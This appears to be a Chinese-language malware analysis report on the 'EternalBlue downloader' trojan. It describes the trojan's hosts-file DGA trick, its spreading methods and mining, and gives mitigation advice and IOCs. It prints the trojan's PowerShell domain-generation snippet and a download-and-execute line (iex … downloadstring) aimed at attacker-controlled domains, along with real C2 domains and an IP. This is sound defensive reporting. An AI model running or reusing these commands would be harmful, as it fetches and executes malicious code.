一、背景
近期騰訊安全御見威脅情報中心檢測到“永恆之藍下載器木馬”使用DGA(隨機生成)域名進行攻擊。黑客入侵系統後,通過安裝計劃任務修改hosts檔案,將生成的DGA(隨機生成)域名對映到其控制的伺服器IP地址,隨後利用該域名進行惡意程式碼下載和執行。病毒的這一行為將會對僅根據惡意域名進行檢測的網路防禦系統造成新的威脅。
二、篡改HOSTS指向隨機域名
域名生成演算法為-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122))), ASCII編碼65到90是大寫字元A到Z,97到122是小寫字母a到z。Count為取的字元個數,Conut值由6+(0~5)(隨機數除以6取餘),也就是取6~11個隨機大小寫字母組合+.com作為DGA(隨機生成)域名。
生成的DGA域名示例如下:
然後依次查詢病毒此前註冊的域名t.awcna.com,t.tr2q.com,t.amxny.com所解析到的IP地址,並通過修改本地hosts檔案將生成的DGA域名對映到這些IP地址,並將該行為安裝為計劃任務Rtsa1。木馬訪問DGA域名時通過訪問本地hosts檔案獲取IP地址,無需進行DNS解析,也就是說攻擊者不需要進行域名註冊。
最後,使用該DGA域名下載後續階段的Powershell惡意程式碼執行,並將該行為安裝為計劃任務Rsta2,實現自動執行。
iex(new-object net.webclient).downloadstring(http://[DGA]/ipco.jsp?0.3)
三、利用多個漏洞攻擊內網挖礦
分析發現,當前版本的“永恆之藍下載器”木馬存在以下漏洞攻擊行為:
1.利用“永恆之藍”漏洞攻擊
2.針對IPC$弱口令進行爆破攻擊
3.針對MSSQL弱口令進行爆破攻擊
4.針對RDP弱口令進行爆破攻擊
5.針對RDP漏洞CVE-2019-0708進行檢測和上報
6.將礦機程式注入Powershell程式挖礦
四、安全建議
1.伺服器使用安全的密碼策略,特別是IPC$、MSSQL、RDP賬號密碼,切勿使用弱口令;
2.根據微軟公告及時修復以下Windows系統高危漏洞;
MS17-010永恆之藍漏洞
XP、WindowsServer2003、win8等系統訪問:
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系統訪問:
https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
RDP服務漏洞 CVE-2019-0708
Windows XP、Windows 2003:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
也可使用騰訊御點或騰訊電腦管家進行漏洞掃描和修復。
(https://s.tencent.com/product/yd/index.html)
3.企業使用者可部署騰訊御界高階威脅檢測系統,發現、追蹤黑客攻擊線索。御界高階威脅檢測系統是基於騰訊安全反病毒實驗室的安全能力、依託騰訊在雲和端的海量資料,研發出的獨特威脅情報和惡意檢測模型系統。(https://s.tencent.com/product/gjwxjc/index.html)
IOCs
MD5
f19d9a77c3f6f07e43f5822f9a796104
8516c4592d8de8b25df3a5e9aeff12e0
URL
t.awcna.com
t.tr2q.com
t.amxny.com
IP
27.102.114.207